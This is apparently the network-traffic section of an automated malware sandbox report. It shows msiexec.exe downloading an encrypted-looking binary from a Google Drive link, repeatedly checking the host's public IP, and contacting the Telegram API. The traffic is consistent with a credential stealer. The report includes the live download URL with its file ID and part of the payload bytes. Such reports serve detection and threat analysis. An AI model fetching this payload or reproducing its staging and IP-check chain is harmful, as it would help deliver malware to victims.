Mar 7, 2025 22:34:35.652527094 CET	49707	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:35.652601957 CET	49707	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:35.657553911 CET	80	49707	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:36.456634045 CET	80	49707	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:36.458506107 CET	49708	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:36.458559036 CET	443	49708	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:36.458667040 CET	49708	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:36.459197998 CET	49708	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:36.459213018 CET	443	49708	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:36.508275032 CET	49707	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:38.535346985 CET	443	49708	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:38.543642044 CET	49708	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:38.543668985 CET	443	49708	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:39.073800087 CET	443	49708	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:39.073864937 CET	443	49708	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:39.073986053 CET	49708	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:39.074559927 CET	49708	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:39.111990929 CET	49707	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:39.117454052 CET	80	49707	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:39.117564917 CET	49707	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:39.120747089 CET	49709	443	192.168.2.6	149.154.167.220
Mar 7, 2025 22:34:39.120794058 CET	443	49709	149.154.167.220	192.168.2.6
Mar 7, 2025 22:34:39.120867968 CET	49709	443	192.168.2.6	149.154.167.220
Mar 7, 2025 22:34:39.121273994 CET	49709	443	192.168.2.6	149.154.167.220
Mar 7, 2025 22:34:39.121284962 CET	443	49709	149.154.167.220	192.168.2.6
Mar 7, 2025 22:34:42.075475931 CET	443	49709	149.154.167.220	192.168.2.6
Mar 7, 2025 22:34:42.075752020 CET	49709	443	192.168.2.6	149.154.167.220
Mar 7, 2025 22:34:42.077351093 CET	49709	443	192.168.2.6	149.154.167.220
Mar 7, 2025 22:34:42.077369928 CET	443	49709	149.154.167.220	192.168.2.6
Mar 7, 2025 22:34:42.077594042 CET	443	49709	149.154.167.220	192.168.2.6
Mar 7, 2025 22:34:42.078883886 CET	49709	443	192.168.2.6	149.154.167.220
Mar 7, 2025 22:34:42.120352983 CET	443	49709	149.154.167.220	192.168.2.6
Mar 7, 2025 22:34:42.727215052 CET	443	49709	149.154.167.220	192.168.2.6
Mar 7, 2025 22:34:42.773706913 CET	49709	443	192.168.2.6	149.154.167.220
Mar 7, 2025 22:34:42.773756981 CET	443	49709	149.154.167.220	192.168.2.6
Mar 7, 2025 22:34:42.774209023 CET	49709	443	192.168.2.6	149.154.167.220
Mar 7, 2025 22:34:42.774305105 CET	443	49709	149.154.167.220	192.168.2.6
Mar 7, 2025 22:34:42.774373055 CET	49709	443	192.168.2.6	149.154.167.220
Mar 7, 2025 22:34:48.330542088 CET	49695	80	192.168.2.6	132.226.8.169

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 22:34:00.232599974 CET	64152	53	192.168.2.6	1.1.1.1
Mar 7, 2025 22:34:00.239850998 CET	53	64152	1.1.1.1	192.168.2.6
Mar 7, 2025 22:34:02.984016895 CET	63626	53	192.168.2.6	1.1.1.1
Mar 7, 2025 22:34:02.993248940 CET	53	63626	1.1.1.1	192.168.2.6
Mar 7, 2025 22:34:08.533601046 CET	62582	53	192.168.2.6	1.1.1.1
Mar 7, 2025 22:34:08.540958881 CET	53	62582	1.1.1.1	192.168.2.6
Mar 7, 2025 22:34:10.149044037 CET	52454	53	192.168.2.6	1.1.1.1
Mar 7, 2025 22:34:10.158226967 CET	53	52454	1.1.1.1	192.168.2.6
Mar 7, 2025 22:34:39.113086939 CET	57391	53	192.168.2.6	1.1.1.1
Mar 7, 2025 22:34:39.120187998 CET	53	57391	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 22:34:00.232599974 CET	192.168.2.6	1.1.1.1	0x9f3c	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:02.984016895 CET	192.168.2.6	1.1.1.1	0xdfda	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:08.533601046 CET	192.168.2.6	1.1.1.1	0xc852	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:10.149044037 CET	192.168.2.6	1.1.1.1	0x471f	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:39.113086939 CET	192.168.2.6	1.1.1.1	0xea7c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 22:34:00.239850998 CET	1.1.1.1	192.168.2.6	0x9f3c	No error (0)	drive.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:02.993248940 CET	1.1.1.1	192.168.2.6	0xdfda	No error (0)	drive.usercontent.google.com		142.250.184.225	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:08.540958881 CET	1.1.1.1	192.168.2.6	0xc852	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 7, 2025 22:34:08.540958881 CET	1.1.1.1	192.168.2.6	0xc852	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:08.540958881 CET	1.1.1.1	192.168.2.6	0xc852	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:08.540958881 CET	1.1.1.1	192.168.2.6	0xc852	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:08.540958881 CET	1.1.1.1	192.168.2.6	0xc852	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:08.540958881 CET	1.1.1.1	192.168.2.6	0xc852	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:10.158226967 CET	1.1.1.1	192.168.2.6	0x471f	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:10.158226967 CET	1.1.1.1	192.168.2.6	0x471f	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:10.158226967 CET	1.1.1.1	192.168.2.6	0x471f	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:10.158226967 CET	1.1.1.1	192.168.2.6	0x471f	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:10.158226967 CET	1.1.1.1	192.168.2.6	0x471f	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:10.158226967 CET	1.1.1.1	192.168.2.6	0x471f	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:10.158226967 CET	1.1.1.1	192.168.2.6	0x471f	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 22:34:39.120187998 CET	1.1.1.1	192.168.2.6	0xea7c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49692	132.226.8.169	80	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 22:34:08.551006079 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 22:34:09.575577974 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 22:34:09.580261946 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 22:34:09.867343903 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 22:34:12.631748915 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 22:34:12.894737959 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49695	132.226.8.169	80	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 22:34:15.231863022 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 22:34:16.033478975 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49697	132.226.8.169	80	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 22:34:18.333512068 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 22:34:20.143603086 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 22:34:20.195055008 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49699	132.226.8.169	80	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 22:34:22.536823988 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 22:34:23.757919073 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49701	132.226.8.169	80	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 22:34:26.109200954 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 22:34:26.938072920 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49703	132.226.8.169	80	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 22:34:29.221678019 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 22:34:30.023307085 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49705	132.226.8.169	80	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 22:34:32.261429071 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 22:34:33.047346115 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49707	132.226.8.169	80	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 22:34:35.652601957 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 22:34:36.456634045 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49690	142.250.181.238	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:02 UTC	216	OUT	GET /uc?export=download&id=1gmLqJmY2CK4V6PsKGMelJOUJTAS35IYR HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Cache-Control: no-cache
2025-03-07 21:34:02 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 07 Mar 2025 21:34:02 GMT Location: https://drive.usercontent.google.com/download?id=1gmLqJmY2CK4V6PsKGMelJOUJTAS35IYR&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-1RB0NErVWX1dLSR2DyfhYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49691	142.250.184.225	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:04 UTC	258	OUT	GET /download?id=1gmLqJmY2CK4V6PsKGMelJOUJTAS35IYR&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-03-07 21:34:07 UTC	5007	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AKDAyIs_PjPwyCbP-BY-v-EyyCJvdxJFFHgO5v8sCGIPyOfXPKtNtpBsVlHVpT-Bnz9DLiA Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="kzcJSr62.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 254016 Last-Modified: Wed, 12 Feb 2025 10:13:09 GMT Date: Fri, 07 Mar 2025 21:34:07 GMT Expires: Fri, 07 Mar 2025 21:34:07 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=t9AmKw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-07 21:34:07 UTC	5007	IN	Data Raw: 6c 81 c7 77 55 d1 45 b1 eb 50 1a 13 96 73 7f 39 e9 70 0c fd fe a4 b1 fc 8d a6 74 57 e1 1a 1e 5c 6c 8c d6 6b c1 65 d1 b6 1c e6 e3 91 66 f2 55 d8 29 19 e7 98 e6 dd 0b c9 e2 f3 72 67 f1 a7 d6 da 28 9d e8 65 c4 c2 1e 3f 2e a7 9e 8b 60 d1 b0 62 08 5e 9b 48 9f 37 cc b9 e3 05 84 fc 1c 52 3b 51 29 ee ff a0 b1 6f 52 20 30 d6 37 dc 3e d0 f7 fb 67 04 97 37 17 36 90 e2 e0 d8 a8 8a c7 60 c5 fa 49 13 18 9b 85 3b 85 e3 2c 77 76 6b 11 51 1c da c0 05 04 7c db d2 c2 75 a6 81 b6 ae 61 fd 52 52 a4 af dc a3 c5 2f 65 c2 3f ed 1d 22 fb 48 0e 3f 3c d2 f1 50 3e 31 fa 76 70 aa 1b 6b 52 c4 3b 02 90 5e 58 d0 94 4f 25 04 79 e9 27 47 51 04 72 e7 10 3a 2d 2b 1c a7 f8 14 c9 a4 99 a7 0f 58 36 c5 67 cb 72 5f 9a 6e 4f 5e 8e 90 e6 73 a4 f8 e5 59 69 f4 cb c8 26 eb c8 a6 68 e0 1b 76 73 ed 32 Data Ascii: lwUEPs9ptW\lkefU)rg(e?.`b^H7R;Q)oR 07>g76`I;,wvkQ\|uaRR/e?"H?<P>1vpkR;^XO%y'GQr:-+X6gr_nO^sYi&hvs2
2025-03-07 21:34:07 UTC	4686	IN	Data Raw: ce 8c f2 8e 65 fc 86 9c 0b 1b ae 1e d9 81 2d 46 09 3b 6e 9c d4 e7 0c f3 5e 66 35 18 41 24 f8 54 16 2d d0 50 de 10 ed dc 8f 7f e7 13 65 f5 37 aa 31 65 75 89 5d ee ff e8 3b 16 c4 fd 16 01 c6 50 0d df 1f 5a ae c6 94 50 51 34 29 57 ac f0 58 e6 7e 07 82 0e 74 6c dc d1 3d b2 27 8f 8c 5e e0 ce 54 b1 36 f0 2f 89 eb de db 11 47 3c 23 ac 3f 4b d5 a1 71 ba cf d1 bf 41 c2 64 87 60 01 f0 a5 54 85 13 bc 34 5e 4b 50 b2 ae 67 e7 fc 8b 81 1e 90 3b 7d 8c 6d 7a e4 bf 52 b8 39 a9 82 36 5d 0c 2d 7e 64 17 27 bd 29 8a 4e 71 af 89 0f 11 c7 64 b9 39 24 27 20 10 28 a9 19 ea e8 62 b6 9a b9 c5 72 fa 0d 30 0d db 11 c3 18 2c c5 b1 51 29 6f 6f 6d 11 ee 41 ef ea df 9a b5 36 0f b9 0f a7 07 4f ae 11 f3 57 17 f4 58 3c 3d 59 61 71 6c 69 0e f6 97 14 2a d3 7e 4a cf 19 88 2c e0 18 96 b2 87 42 Data Ascii: e-F;n^f5A$T-Pe71eu];PZPQ4)WX~tl='^T6/G<#?KqAd`T4^KPg;}mzR96]-~d')Nqd9$' (br0,Q)oomA6OWX<=Yaqli*~J,B
